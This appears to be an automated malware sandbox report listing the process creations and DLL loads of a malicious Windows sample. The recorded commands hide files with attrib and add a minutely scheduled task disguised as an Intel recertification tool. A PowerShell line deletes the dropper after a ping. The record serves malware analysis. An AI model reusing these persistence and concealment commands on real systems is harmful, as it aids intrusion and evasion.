                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeProcess created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe"
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                          Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                          Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: dnsapi.dll
